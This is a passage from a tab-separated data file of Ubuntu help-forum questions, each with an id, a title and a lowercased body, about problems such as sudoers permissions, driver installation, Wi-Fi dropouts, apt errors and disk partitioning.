94217	unable to access drives	error : sudo : /etc/sudoers is owned by uid 1000 , should be 0 segmentation fault . this comes up when trying to mount drives . usb , external drives , cd are unmountable , so i am unable to access any drives . same message comes up with sudo fdisk -l : sudo : /etc/sudoers is owned by uid 1000 , should be 0 segmentation fault . output of desktop : ~ $ cat /proc/partitions : major minor # blocks name 8 0 156290904 sda 8 1 151749958 sda1 8 2 1 sda2 8 5 4538331 sda5 8 16 244198584 sdb 8 17 102400 sdb1 8 18 244093952 sdb2 8 32 15633408 sdc 8 33 15633392 sdc1 8 48 7812608 sdd 8 49 7812592 sdd1 seems to be permission issue that just started . suggestions are welcome .
94218	hp pavilion g6 . when keys are held , the touch pad does n't work . any way to fix it ?	i 've been looking all trough through google and i 've seen people with the same problem , when i 'm trying to play a game ( minecraft ) i move with the keyboard and look with the mouse , but whenever i try and move the the touchpad locks on me , i 've been searching through google and my settings but i cant find out how to get rid of this `` feature '' and its just making me so frustrated .
94222	how do i hibernate my computer ?	i tried the command sudo s2disk but the os said command not found so i went and installed sudo apt-get install uswsusp now the command worked , and the computer did hibernate , but it failed to resume . i also installed gnome-shell-extensions-alternative-status-menu hoping that hibernate would show up in the menu , but it did n't . ( i did press the alt key )
94228	customizing an iso to include radeon graphics drivers	so i recently purchased the toshiba satellite l7775d laptop . i wanted to install ubuntu , but i ca n't even boot a livecd without the graphics card drivers for the proprietary radeon card . so i need to customize a livecd to include the drivers . could someone explain how to do this ? thank you .
94231	openshot video editor shuts down my system while exporting a project to hdyoutube ( ubuntu 11.10 )	as you read i 'm having untimely difficulties with `` openshot '' . i do a lot of editing for youtube and it requires hd uploading.now the problem here seems rather odd and i know of a few people who are suffering from the same issue . this problem began when i installed the ubuntu 11.10 update . i went into the video editor and began my project . after finishing i moved to export and set the same hd export setting . profile : web target : youtube-hd video profile : hd 720p 25fps quality : med or high ( both have the same output ) -i 'm not sure if thats the exact way how to export into youtube-hd , but that 's irrelevant 'maybe'.- i begin the export . here 's the kicker ... after 5 minutes and almost half way through the export , the entire system `` shuts off '' . it takes a few minutes to restart it , attempting restart to early makes it shut down again ... ( i have to wait a good 3 or 4 minutes . thankfully i saved my projects ) i 'd appreciate some help on this , and excuse me for my `` wrong ways of posting '' i 'm a noob , so try being a little patient ^_^ ( if this problem ca n't be solved in the next few hours , i 'll be late on my next upload and most likely loose my job for youtube ... )
94238	rtl8188ce disconnects and wo n't reconnect on lenovo e520	i installed the rtl8188ce driver off the realtek website . it will connect after a fresh boot and work well . but at some point it disconnects ( usually within 15 mins ) and then will not reconnect . it remains stuck at `` obtaining ip address ... '' until it fails to connect entirely and will not connect without reboot . dmesg output from disconnecting manually and trying to reconnect : [ 376.982528 ] wlan0 : deauthenticating from 00:18 : e7 : d1:13 : a6 by local choice ( reason=3 ) [ 377.026775 ] cfg80211 : all devices are disconnected , going to restore regulatory settings [ 377.026788 ] cfg80211 : restoring regulatory settings [ 377.026802 ] cfg80211 : calling crda to update world regulatory domain [ 377.033575 ] cfg80211 : updating information on frequency 2412 mhz for a 20 mhz width channel with regulatory rule : [ 377.033585 ] cfg80211 : 2402000 khz - 2472000 khz @ khz ) , ( 300 mbi , 2000 mbm ) [ 377.033592 ] cfg80211 : updating information on frequency 2417 mhz for a 20 mhz width channel with regulatory rule : [ 377.033597 ] cfg80211 : 2402000 khz - 2472000 khz @ khz ) , ( 300 mbi , 2000 mbm ) [ 377.033602 ] cfg80211 : updating information on frequency 2422 mhz for a 20 mhz width channel with regulatory rule : [ 377.033608 ] cfg80211 : 2402000 khz - 2472000 khz @ khz ) , ( 300 mbi , 2000 mbm ) [ 377.033613 ] cfg80211 : updating information on frequency 2427 mhz for a 20 mhz width channel with regulatory rule : [ 377.033619 ] cfg80211 : 2402000 khz - 2472000 khz @ khz ) , ( 300 mbi , 2000 mbm ) [ 377.033623 ] cfg80211 : updating information on frequency 2432 mhz for a 20 mhz width channel with regulatory rule : [ 377.033629 ] cfg80211 : 2402000 khz - 2472000 khz @ khz ) , ( 300 mbi , 2000 mbm ) [ 377.033634 ] cfg80211 : updating information on frequency 2437 mhz for a 20 mhz width channel with regulatory rule : [ 377.033639 ] cfg80211 : 2402000 khz - 2472000 khz @ khz ) , ( 300 mbi , 2000 mbm ) [ 377.033644 ] cfg80211 : updating information on frequency 2442 mhz for a 20 mhz width channel with regulatory rule : [ 377.033650 ] cfg80211 : 2402000 khz - 2472000 khz @ khz ) , ( 300 mbi , 2000 mbm ) [ 377.033654 ] cfg80211 : updating information on frequency 2447 mhz for a 20 mhz width channel with regulatory rule : [ 377.033660 ] cfg80211 : 2402000 khz - 2472000 khz @ khz ) , ( 300 mbi , 2000 mbm ) [ 377.033665 ] cfg80211 : updating information on frequency 2452 mhz for a 20 mhz width channel with regulatory rule : [ 377.033670 ] cfg80211 : 2402000 khz - 2472000 khz @ khz ) , ( 300 mbi , 2000 mbm ) [ 377.033675 ] cfg80211 : updating information on frequency 2457 mhz for a 20 mhz width channel with regulatory rule : [ 377.033680 ] cfg80211 : 2402000 khz - 2472000 khz @ khz ) , ( 300 mbi , 2000 mbm ) [ 377.033685 ] cfg80211 : updating information on frequency 2462 mhz for a 20 mhz width channel with regulatory rule : [ 377.033691 ] cfg80211 : 2402000 khz - 2472000 khz @ khz ) , ( 300 mbi , 2000 mbm ) [ 377.033696 ] cfg80211 : updating information on frequency 2467 mhz for a 20 mhz width channel with regulatory rule : [ 377.033701 ] cfg80211 : 2457000 khz - 2482000 khz @ khz ) , ( 300 mbi , 2000 mbm ) [ 377.033706 ] cfg80211 : updating information on frequency 2472 mhz for a 20 mhz width channel with regulatory rule : [ 377.033712 ] cfg80211 : 2457000 khz - 2482000 khz @ khz ) , ( 300 mbi , 2000 mbm ) [ 377.033717 ] cfg80211 : updating information on frequency 2484 mhz for a 20 mhz width channel with regulatory rule : [ 377.033722 ] cfg80211 : 2474000 khz - 2494000 khz @ khz ) , ( 300 mbi , 2000 mbm ) [ 377.033730 ] cfg80211 : ignoring regulatory request set by core since the driver uses its own custom regulatory domain [ 377.033736 ] cfg80211 : world regulatory domain updated : [ 377.033740 ] cfg80211 : ( start_freq - end_freq @ bandwidth ) , ( max_antenna_gain , max_eirp ) [ 377.033746 ] cfg80211 : ( 2402000 khz - 2472000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 377.033751 ] cfg80211 : ( 2457000 khz - 2482000 khz @ 20000 khz ) , ( 300 mbi , 2000 mbm ) [ 377.033757 ] cfg80211 : ( 2474000 khz - 2494000 khz @ 20000 khz ) , ( 300 mbi , 2000 mbm ) [ 377.033762 ] cfg80211 : ( 5170000 khz - 5250000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 377.033767 ] cfg80211 : ( 5735000 khz - 5835000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 377.410687 ] addrconf ( netdev_up ) : wlan0 : link is not ready [ 381.585606 ] addrconf ( netdev_up ) : wlan0 : link is not ready [ 382.055261 ] r8169 0000:02:00.0 : eth0 : link down [ 382.056132 ] addrconf ( netdev_up ) : eth0 : link is not ready [ 383.054538 ] addrconf ( netdev_up ) : wlan0 : link is not ready [ 385.443375 ] type=1400 audit ( 1326614570.735:25 ) : apparmor= '' denied '' operation= '' open '' parent=2934 profile= '' /sbin/dhclient '' name= '' /var/lib/wicd/dhclient.conf '' pid=2978 comm= '' dhclient '' requested_mask= '' r '' denied_mask= '' r '' fsuid=0 ouid=0 [ 698.379232 ] addrconf ( netdev_up ) : wlan0 : link is not ready [ 698.462389 ] wlan0 : authenticate with 00:18 : e7 : d1:13 : a6 ( try 1 ) [ 698.464371 ] wlan0 : authenticated [ 698.464433 ] wlan0 : associate with 00:18 : e7 : d1:13 : a6 ( try 1 ) [ 698.467889 ] wlan0 : rx assocresp from 00:18 : e7 : d1:13 : a6 ( capab=0x421 status=0 aid=3 ) [ 698.467899 ] wlan0 : associated [ 698.479224 ] addrconf ( netdev_change ) : wlan0 : link becomes ready [ 698.889673 ] r8169 0000:02:00.0 : eth0 : link down [ 698.890592 ] addrconf ( netdev_up ) : eth0 : link is not ready [ 708.491216 ] wlan0 : no ipv6 routers present
94239	'authentication required ' dialogue is asking for the wrong account	for example if i try to install software from the software centre , or change update manager settings , instead of asking for my password , it asks for that of another admin account ! i have to resort to the command line to do anything . this has only been happening since i recently did an upgrade from 10.10- > 11.04- > 11.10 . does anyone know why this is happening or how i can fix it ?
94242	why eclipse can not find the hidden .project file until i press ctrl-h on folder ?	i am using eclipse on ubuntu 11.10 when i try to open an project in eclipse ide , it complains that the .project file can not be found . now if i open the project folder in ubuntu file browser and press ctrl-h the hidden .project file is shown . after this , moving back to eclipse i can easily open the project . i need to do this every time i login to ubuntu .
94243	hp photosmart 5510 multifunction printer scanner not found	i can not get my ubuntu 11.10 system to recognize the scanner in my hp photosmart 5510 multi-funtion printer . i have loaded the hplip extras from my terminal window and loaded the latest hplip . i have searched the web and all forums for any mention of photosmart 5510 ubuntu drivers with no success . i have simple scan , skanlite , and xsane all installed . the printer prints well , the usb works in any way i can detect .
94247	how do i add a local mirror to my software sources ?	my institute hosts ubuntu repositories and i have added them . however , whenever i am downloading any software from synaptic/software_centre , it downloads from the main ubuntu server and not my institute 's server . how do i solve this problem ?
94249	badsig error while updating	i have had too much troubled with this error . i have installed a fresh version of ubuntu 11.10 and then it smoothly ran for 2 days . but , when i run sudo apt-get update i get this error message : w : gpg error : http : //security.ubuntu.com oneiric-security release : the following signatures were invalid : badsig 40976eaf437d05b5 ubuntu archive automatic signing key i have tried this method but it does n't solve the problem : sudo -i # apt-get clean # cd /var/lib/apt # mv lists lists.old # mkdir -p lists/partial # apt-get clean # apt-get update what did i do i have tried all the methods but it again comes . what is the reason for this ? please help me !
94250	embedding pdf in chromium with evince 3 and mozplugger	does anyone accomplished that ? i ca n't get it working , evince opens in it 's own window . i 'm using ubuntu 11.10 with unity , chromium 16 , evince 3.2.1 , mozplugger 1.14.3-4 mozplugger config for pdfs is : repeat noisy needs_xembed swallow ( evince ) fill : evince -w `` $ file '' this works just fine in gentoo with same chromium version but evince 2 ( gtk2 ) and gnome2 . so does anyone got it working or knows what prevents to .
94256	how does ubuntu render fonts better , than other main linux distributions ?	i have often observed that in other distributions ( not ubuntu derivatives ) even after enabling font hinting and rgb aliasing , the fonts dont look as good as ubuntu . what are the specific optimizations carried out in ubuntu for font display ?
94258	resolution problem on intel 950 gpu with ubuntu 11.10	i just got a nice looking ultra mini desktop for us $ 150 , which uses a digisol motherboard with a atom dual core 1.8 ghz processor - d425 , with 2 gb ram . i have a dell 22 '' monitor connected to the machine . the maximum resolution does not go beyond 1024 x 800 . i tried updating the system , but some how it is not going beyond 1024 x800 . the built in graphics card is intel gpu 950 . the chipset is intel nm10 . there are no resolution issues with ubuntu 10.04 on the same machine . it gives a 1920 x 1200 and works quite fast and is stable . any suggestions on how to handle this ? where can i download the drivers from ?
94259	how can i edit songs on a remote server ?	i have a number of songs i am hosting . i would like to edit their id3 tags . downloading and uploading them will take too much time . is it possible to edit them as they are online ? update here is the error i got when i tried installing rhythmbox on the server suggested packages : gconf-defaults-service libbonobo2-bin libdv-bin esound desktop-base libgnomevfs2-bin libgnomevfs2-extra lirc librsvg2-bin sg3-utils python-gnome2-doc python-gobject-dbg python-gst0.10-dev python-gst0.10-dbg python-gtk2-doc python-numpy python-libxml2-dbg python-pyorbit-dbg gstreamer0.10-plugins-bad python-coherence gnome-codec-install gnome-control-center gstreamer0.10-plugins-ugly brasero recommended packages : libpam-ck-connector esound-clients gnome-media gvfs-backends gnome-keyring libgpod-common launchpad-integration notification-daemon libvisual-0.4-plugins yelp avahi-daemon the following new packages will be installed consolekit dbus-x11 devicekit-disks esound-common gamin gconf2 gnome-icon-theme gnome-media-common gnome-mime-data gstreamer0.10-plugins-base gstreamer0.10-plugins-good gstreamer0.10-x gvfs hicolor-icon-theme libaa1 libart-2.0-2 libatasmart4 libaudiofile0 libavahi-glib1 libavc1394-0 libbonobo2-0 libbonobo2-common libbonoboui2-0 libbonoboui2-common libbrasero-media0 libcaca0 libcdparanoia0 libck-connector0 libcroco3 libdv4 libeggdbus-1-0 libesd-alsa0 libffi5 libgail-common libgail18 libgamin0 libgdu0 libglade2-0 libgmime-2.4-2 libgnome-keyring0 libgnome-media0 libgnome2-0 libgnome2-common libgnomecanvas2-0 libgnomecanvas2-common libgnomeui-0 libgnomeui-common libgnomevfs2-0 libgnomevfs2-common libgpod4 libgsf-1-114 libgsf-1-common libgtk2.0-bin libgudev-1.0-0 libgvfscommon0 libhal-storage1 libhal1 libiec61883-0 liblaunchpad-integration1 liblircclient0 libmtp8 libmusicbrainz4c2a libnautilus-extension1 libnotify1 libpolkit-agent-1-0 libpolkit-backend-1-0 libpolkit-gobject-1-0 libproxy0 librsvg2-2 librsvg2-common libsgutils2-2 libshout3 libsoup-gnome2.4-1 libsoup2.4-1 libtag1-vanilla libtag1c2a libtotem-plparser12 libv4l-0 libvisual-0.4-0 libwavpack1 libxv1 media-player-info policykit-1 policykit-1-gnome python-cairo python-gconf python-gnome2 python-gnomecanvas python-gobject python-gst0.10 python-gtk2 python-libxml2 python-pyorbit rhythmbox 0 upgraded , 94 newly installed , 0 to remove and 2 not upgraded . need to get 18.1mb/18.5mb of archives . after this operation , 112mb of additional disk space will be used . do you want to continue [ y/n ] ? warning : the following packages can not be authenticated ! libck-connector0 libeggdbus-1-0 libpolkit-gobject-1-0 consolekit dbus-x11 libatasmart4 libgudev-1.0-0 libpolkit-backend-1-0 libsgutils2-2 devicekit-disks esound-common libgamin0 gamin gconf2 hicolor-icon-theme libgtk2.0-bin libcroco3 libgsf-1-common libgsf-1-114 librsvg2-2 librsvg2-common gnome-icon-theme gnome-media-common gnome-mime-data libcdparanoia0 libvisual-0.4-0 libxv1 gstreamer0.10-plugins-base libaa1 libavc1394-0 libcaca0 libdv4 libhal1 libiec61883-0 libshout3 libgnome-keyring0 libproxy0 libsoup2.4-1 libsoup-gnome2.4-1 libtag1-vanilla libtag1c2a libv4l-0 libwavpack1 gstreamer0.10-plugins-good gstreamer0.10-x libgdu0 libavahi-glib1 libgvfscommon0 libpolkit-agent-1-0 policykit-1 policykit-1-gnome gvfs libart-2.0-2 libaudiofile0 libbonobo2-common libbonobo2-0 libglade2-0 libesd-alsa0 libhal-storage1 libgnomevfs2-common libgnomevfs2-0 libgnome2-common libgnome2-0 libgail18 libgail-common libgnomecanvas2-common libgnomecanvas2-0 libbonoboui2-common libbonoboui2-0 liblaunchpad-integration1 libnautilus-extension1 libgmime-2.4-2 libtotem-plparser12 libbrasero-media0 libgnome-media0 libgnomeui-common libgnomeui-0 libgpod4 libmtp8 libmusicbrainz4c2a libnotify1 media-player-info python-cairo libffi5 python-gobject python-gconf python-gnomecanvas python-gtk2 python-pyorbit python-gnome2 python-libxml2 python-gst0.10 liblircclient0 rhythmbox install these packages without verification [ y/n ] ? e : some packages could not be authenticated roland @ localhost : ~ $
94262	empathy not able to sign into a sip account	i am running a ubuntu 10.04 and trying to configure three sip accounts on my machine . following is the status of 3 accounts iptel.org - i can sign in - it shows i am online , but i am unable to make calls or receive calls corporate ip pbx1 ( 10.30.5.61 ) - unable to sign in - says network error . i am able to connect to this ip pbx using jitsi and same credentials . corporate ip pbx2 ( 10.1.3.26 ) - able to sign in - can make incoming & outgoing calls using empathy and jitsi . works nicely - audio , video - both ip pbx1 - is based on trixbox ip pbx2 - is based on piaf would appreciate any help
94264	is installing ubuntu on mac as simple as installing on a generic pc ?	i am planning to buy a new laptop and as i 'm an ubuntu fanatic . i 'd like to know whether the procedure of installing ubuntu on a mac is as simple and straight-forward as it is on a pc . if it is then i 'll go with mac otherwise i 'll stick to lenovo .
94266	unable to install more than one software at once	softwares in usc installs one after the other , is there any way to make more than one sofware install at the same time ?
94269	how do i install a .crt file in firefox for windmill testing framework ?	i am trying to use the windmill testing framework over https . when i run windmill firefox http : //www.example.com the windmill ide comes up fine . when i run windmill firefox https : //www.example.com the ide fails . ( i have installed pyopenssl in my python virtual environment . https failed completely before i did this . ) i suspect that this is because i have n't installed the certificate authority ( .crt file ) for windmill itself . the windmill team provide instructions for installing the windmill ca on windows and mac , but not linux , let alone ubuntu : ( the instructions on https : //help.ubuntu.com/8.04/serverguide/c/certificates-and-security.html and how do i install a root certificate ? suggest that i need both a .crt file and a .key file , but only a .crt file is provided , and seems to be all that is needed on other oses . how can i install the provided .crt file ? ( or , what is the ubuntu equivalent of the provided windows/mac instructions ? )
94270	why is ubuntu one syncing so slow ?	i 'd like to use ubuntu one to sync some important files that i use frequently across several machines . i have ubuntu one set up correctly ( or so it appears ) , yet when i add the folder , it took about 15 minutes to upload a single 5kb readme file . there is a notification that says it is transferring x and # # # # other files , and i guess it is , but it is doing so painfully slowly . my connection is not slow ; there seems to be no reason for the speed to be so poor . i 've checked the settings and i do n't have the bandwidth limiter on either . does anyone else have this problem ? i ca n't image anyone using this service or paying for it for that matter if it were so slow . what can i do about it ? also , i 'm on 11.10 64bit
94272	ati driver issue , fglrxinfo returning null display error , xorg.conf file looks funky	i have a hp dv6 , specifically with a ati radeon hd 5650 . it 's one of those wonderful hybrid graphics cards . i 've spent a great amount of time trying to install the drivers for this graphics card properly . my primary reason to do this is to run gnome 3 , which will not work properly when i install the fglrx driver from the additional drivers section of system settings . i know the desire to run gnome 3 might sound trivial , but i 've made it my mission to get this to work . is there a way to simply ignore the ati graphics and go with the intel graphics when using gnome ? so , after reinstalling ubuntu using wubi , i immediately followed this guide . however , i ran into some blocks . when i ran the aticonfig command , i got a response powerxpress error : can not stat '/usr/lib64/fglrx ' : no such file or directory i setup a symbolic link between /usr/lib and /usr/lib64 . i do not know if that is correct , but it got my forward . when i rebooted the computer after calling aticonfig , i ended up hanging while booting on a black screen . it was like checking blah [ ok ] ... .. checking battery state [ ok ] there were some fails , but the ones i could see were not important . so i go into tty1 and trying running the command fglrxinfo , but i receive the response : error : unable to open display ( null ) so , i look at my xorg.conf file , and the contents , which seem strange , are as follows : section `` serverlayout '' identifier `` aticonfig layout '' screen 0 `` aticonfig-screen [ 0 ] -0 '' 0 0 endsection section `` module '' endsection section `` monitor '' identifier `` aticonfig-monitor [ 0 ] -0 '' option `` vendorname '' `` ati proprietary driver '' option `` modelname '' `` generic autodetecting monitor '' option `` dpms '' `` true '' endsection section `` device '' identifier `` aticonfig-device [ 0 ] -0 '' driver `` fglrx '' busid `` pci:1:0:0 '' endsection section `` screen '' identifier `` aticonfig-screen [ 0 ] -0 '' device `` aticonfig-device [ 0 ] -0 '' monitor `` aticonfig-monitor [ 0 ] -0 '' defaultdepth 24 subsection `` display '' viewport 0 0 depth 24 endsubsection section i tried doing aticonfig -- acpi-services=off as well as other threads state , but that did not work . i 'd really appreciate any help that i can get . thanks . edit i found out that if i remove my xorg.conf file , i can at least boot and login into ubuntu 's gui
94274	ubuntu 9.04 upgrade to ubuntu 11.10 failed , initramfs ? sos	i was trying to upgrade my company desktop ubuntu 9.04 to ubuntu 11.10 . however , run until half way , the electric line was breakdown . when i reboot the computer again , the installation is incomplete and all the files seem gone ! when i click install ubuntu , there is no detected operating system ! gosh ! how should i do ? all my company p & c files have n't backed-up yet .
94277	shortcut to restart the x-screen in xubuntu like 'r ' is for gnome shell	just like in gnome-shell , wherein you can restart the x-screen with a terminal command 'r ' without closing any of the running applications , is there something in xubuntu which could serve the same purpose ?
94280	how do i preseed a disk to 50 % / and /tmp ?	i need to install ubuntu server 10.04 by preseed file and part disk into 50 % for / and rest for /tmp . i tried this : # partitioning # use first hard drive scsi/sata : d-i partman-auto/disk string /dev/sda d-i partman-auto/method string regular d-i partman-auto/purge_lvm_from_device boolean true d-i partman-lvm/device_remove_lvm boolean true d-i partman-md/device_remove_md boolean true d-i partman-lvm/confirm boolean true d-i partman-auto/choose_recipe select atomic # actualy use 50 % for / and rest 50 % for /logs d-i partman-auto/expert_recipe string \ boot-root : : \ 2048 50 % 1000000000 ext4 \ $ primary { } \ method { format } format { } \ use_filesystem { } filesystem { ext4 } \ mountpoint { / } \ . \ 2048 50 % -1 ext4 \ method { format } format { } \ use_filesystem { } filesystem { ext4 } \ mountpoint { /tmp } \ . \ 50 % 4096 50 % linux-swap \ method { swap } format { } \ . d-i partman-partitioning/confirm_write_new_label boolean true d-i partman/choose_partition select finish d-i partman/confirm boolean true d-i partman/confirm_nooverwrite boolean true can anyone tell me , why it does n't works ? it creates only 1.9 gb to / and /tmp . thanks !
94281	how can i access my files through the internet from a browser ?	i remember using a software called wwwfilesharepro on windows that allowed me to access any folder through a browser . is there a similar way to do this on ubuntu ?
94282	windows always appear focused	in the above image i have included an snapshot of the problem . all the windows are behaving like they are focused on oneiric 64 bit . i tried to change to the default theme . but , no solution .
94287	how to auto mount windows mapped drives per user ?	i have a deployment which consists of windows ad with a share folder for each user . an example for that : the user john has a share folder \ip/mapped_drives/john so , what i need is to auto mount these shares to its corresponding users . i followed this link but with no luck auto-mounting network shares per user because i do n't have the credentials , the credentials are in the active directory . so , is there a way to resolve that ?
94298	which algorithm does `` encrypt home directory '' use ?	when encrypting a user 's home directory , either during the install procedure or later using ecryptfs-migrate-home , what encryption algorithm / key size is used by default ?
94299	tool to know what is making the desktop load longer than usual	is there such a tool ? my desktop as of late is taking longer to load than usual . i 'd say it takes more than 20 seconds from gdm login until i see the desktop . aside from disabling all app-indicators and testing it manually one by one , what else should be done ? the only indicator i remember activating lately was bluetooth and i have already disabled it from startup applications . no improvement . i know of bootchart , but i do n't really have a problem with boot . it is only after i login that the issue occurs . i 'm on natty narwhal . *updating this thread ... . the issue seems to have fixed itself and i did not even do anything . it is really weird . i guess this is how gnome works ( and talk about not recognizing your theme and reverting to windows 95-like look . how about that ? ) . i have been a long time kde user and i never encountered issues like this one . the kde then may have booted into the desktop longer ( from kdm ) but at least i know it was consistent .
94301	old ubuntu breezy apt/dpkg broken	we have an old ubuntu breezy server which someone unsucessfully has tried to upgrade in the past . we need it upgraded , but almost all apt-get operations return something like this : apt-get install -f reading package lists ... done building dependency tree ... done 0 upgraded , 0 newly installed , 0 to remove and 49 not upgraded . 3 not fully installed or removed . need to get 0b of archives . after unpacking 0b of additional disk space will be used . ca n't exec `` locale '' : no such file or directory at /usr/share/perl5/debconf/encoding.pm line 16 . use of uninitialized value in scalar chomp at /usr/share/perl5/debconf/encoding.pm line > 17 . dpkg : dependency problems prevent configuration of apt : dpkg ( 1.14.5ubuntu16 ) breaks apt ( < < 0.7.6ubuntu6 ) and is installed . version of apt to be configured is 0.6.43.3ubuntu2 . dpkg : error processing apt ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of apt-utils : apt-utils depends on libapt-pkg-libc6.3-6-3.11 ; however : package libapt-pkg-libc6.3-6-3.11 is not installed . package apt which provides libapt-pkg-libc6.3-6-3.11 is not configured yet . dpkg : error processing apt-utils ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of aptitude : aptitude depends on libapt-pkg-libc6.3-6-3.11 ; however : package libapt-pkg-libc6.3-6-3.11 is not installed . package apt which provides libapt-pkg-libc6.3-6-3.11 is not configured yet . dpkg ( 1.14.5ubuntu16 ) breaks aptitude ( < < 0.4.6.1-1ubuntu2 ) and is installed . version of aptitude to be configured is 0.4.0-5ubuntu3 . dpkg : error processing aptitude ( -- configure ) : dependency problems - leaving unconfigured errors were encountered while processing : apt apt-utils aptitude e : sub-process /usr/bin/dpkg returned an error code ( 1 ) any ideas as to how i can correct this , so we can upgrade one ver . at a time ( or up to 10.04 )
94302	is there any way to stop unity from lagging when i drag and drop url 's when using firefox ?	when using firefox i often drag urls 's either to the address bar or search boxes . when i drag url 's the unity launcher will appear and show which programs the url can be dragged to . however this causes my system to briefly lag while the launcher sorts itself out . during this time i ca n't 'drop ' the url so am often left waiting for a couple of seconds which is a little frustrating . i have tried making the launcher always be present by following the answers to this question how do i stop the unity side bar from apearing when i try to drag & drop ? and using my unity . but this has n't stop the lag . so is there a way to either : a ) stop unity from recognising that i 'm dragging an url and so stop the lag ? b ) is it possible that some animation setting is causing the lag and that i could turn it off ? ( i do n't have any other noticeable lag at all when using ubuntu in any other circumstances except this , so do n't think it is my system being slow ) . any thoughts or possible solutions gratefully received , thanks for your time askubuntu-ers !
94306	screen flickers on a lenovo y460 laptop	i have a lenovo y460 laptop with hybrid graphics . it 's a nvidia optimus card and a integrated intel graphics . i 'm only using the integrated chip and i do n't want use the nvidia card the problem occur in ubuntu 10.04 and ubuntu 11.10 i can not work when the flickering occur . that all right in windows 7 so i think it 's a driver or kernel problem i have try the i915.powersave=0 but it 's no use and i915.modeset=1 make the resultion horrible the only clue is the xorg.0.log , when the flickering occur the xorg.0.log full with : [ 2868.431 ] ( ii ) intel ( 0 ) : modeline `` 1366x768 '' x0.0 71.00 1366 1414 1446 1502 768 771 776 788 -hsync -vsync ( 47.3 khz ) [ 2873.979 ] ( ii ) intel ( 0 ) : printing ddc gathered modelines : [ 2873.979 ] ( ii ) intel ( 0 ) : modeline `` 1366x768 '' x0.0 71.00 1366 1414 1446 1502 768 771 776 788 -hsync -vsync ( 47.3 khz ) [ 2874.479 ] ( ii ) intel ( 0 ) : edid vendor `` lgd '' , prod id 654 [ 2874.479 ] ( ii ) intel ( 0 ) : printing ddc gathered modelines : [ 2874.479 ] ( ii ) intel ( 0 ) : modeline `` 1366x768 '' x0.0 71.00 1366 1414 1446 1502 768 771 776 788 -hsync -vsync ( 47.3 khz ) [ 2881.539 ] ( ii ) intel ( 0 ) : edid vendor `` lgd '' , prod id 654 [ 2881.539 ] ( ii ) intel ( 0 ) : printing ddc gathered modelines : [ 2881.539 ] ( ii ) intel ( 0 ) : modeline `` 1366x768 '' x0.0 71.00 1366 1414 1446 1502 768 771 776 788 -hsync -vsync ( 47.3 khz ) [ 2881.539 ] ( ii ) intel ( 0 ) : edid vendor `` lgd '' , prod id 654 [ 2881.539 ] ( ii ) intel ( 0 ) : printing ddc gathered modelines : [ 2881.539 ] ( ii ) intel ( 0 ) : modeline `` 1366x768 '' x0.0 71.00 1366 1414 1446 1502 768 771 776 788 -hsync -vsync ( 47.3 khz ) i do n't know who output the information and there is another clue when the flickering occur , i switch to tty1 ( crtl+alt+f1 ) , i found there some char `` ^ @ '' output to the screen . even when the os boot i found the char `` ^ @ '' occur in the screen update : my problem maybe is a acpi problem so i have try below kernel params : acpi_osi=linux acpi_backlight=vendor acpi=copy_dsdt nohz=off highres=off acpi=noirq pcie_aspm=force you also could try : acpi=off nolapic but it 's a nuclear way because it make another problem
94315	can ubuntu unity be made as snappy as xubuntu ?	i am fan of xubuntu just because of its snappiness . now i know that it is based on light-weight xfce which is the secret for this snappiness but i am just wondering if something could be done on unity to bring it , say , close to that snappiness ? i have not installed nvidia 's driver as i have never seen any improvements on ubuntu . would love to hear views on this in case somebody have been able to tweak some settings .
94317	thunderbird 's unity icon keeps showing unread mail indication even if there is no unread mail	thunderbird icon like this which indicate a unread email , keeps on displaying emails as unread even when the new mails have been read and are no longer 'unread ' . any known issues ?
94321	permission denied on ~ even though owner listed as me	somehow , i managed to chmod and chown my ~ into oblivion . when i attempt to login through the shell , i get bash : ~/.bashrc : permission denied even after ( as root ) i 've run chown -hr nroach44 /home/nroach44 and chmod -r 666 /home/nroach44 or ( as nroach44 ) chmod -r 644 /home/nroach44 none of these commands return errors . also : ls -la /home/nroach44 returns lots of drw-rw-rw- 1 nroach44 nroach44 4096 -- date -- ti : me foldername any help ?
94323	adobe air application not showing an icon in unity 's notification area	i have installed saezuri twitter client on adobe air but when i run it , unity 's notification area does n't show any icon for the same , as is shown by default in gnome shell as well as xubuntu .
94328	flash stops working in firefox	i got a weird issue this morning : after an update , my firefox flash plugin stopped working . for any flash object i try to run , it appears a weird black page with a slider on the bottom ( like a video player ) but nothing happens . obviously , any of the flash videos ( or even games ) tried were working perfectly under google chrome . i tried to remove and reinstall adobe-flashplugin from usc , but nothing changed . i had oneiric 32bit with some testing repo like ricotz-testing ppa ( even if i do n't know if this matters ) .
94329	voltages look like overclocking ; is voltage control via a script possible ?	i see that my voltages look like overclocking . i want to know if what i have is right or not , because i always have errors with my voltages . i have a 600w power supply . cdrom does not work sometimes onboard graphics card sucks ide and sata are too slow existing script ? is there any script that helps me to configure voltages ? i 'm not so proficient in bash . here 's an example of how i 'd like to interact with the script : 1.cpu1 2 ... . enter number to configure 1 enter voltage 1.8 v press enter to finish my sensors output : acpitz-virtual-0 adapter : virtual device temp1 : +40.0°c ( crit = +125.0°c ) coretemp-isa-0000 adapter : isa adapter core 0 : +48.0°c ( high = +86.0°c , crit = +100.0°c ) core 1 : +48.0°c ( high = +86.0°c , crit = +100.0°c ) it8718-isa-0290 adapter : isa adapter in0 : +1.20 v ( min = +0.00 v , max = +4.08 v ) in1 : +1.86 v ( min = +1.28 v , max = +1.68 v ) alarm < -- this is what i mean in2 : +3.38 v ( min = +2.78 v , max = +3.78 v ) +5v : +2.98 v ( min = +2.67 v , max = +3.26 v ) in4 : +2.98 v ( min = +2.50 v , max = +3.49 v ) in5 : +0.06 v ( min = +0.58 v , max = +1.34 v ) alarm < -- -really toooo low in6 : +0.10 v ( min = +1.04 v , max = +1.36 v ) alarm < -- -- tooo low too ! 5vsb : +2.94 v ( min = +2.67 v , max = +3.26 v ) vbat : +3.09 v fan1 : 0 rpm ( min = 10 rpm ) alarm < -- i dont have a fan 1 fan2 : 1859 rpm ( min = 10 rpm ) fan3 : 0 rpm ( min = 10 rpm ) alarm < -- i dont have a fan 3 temp1 : +32.0°c ( low = +127.0°c , high = +126.0°c ) sensor = thermal diode temp2 : +38.0°c ( low = +127.0°c , high = +112.0°c ) sensor = thermistor temp3 : -47.0°c ( low = +127.0°c , high = +112.0°c ) sensor = 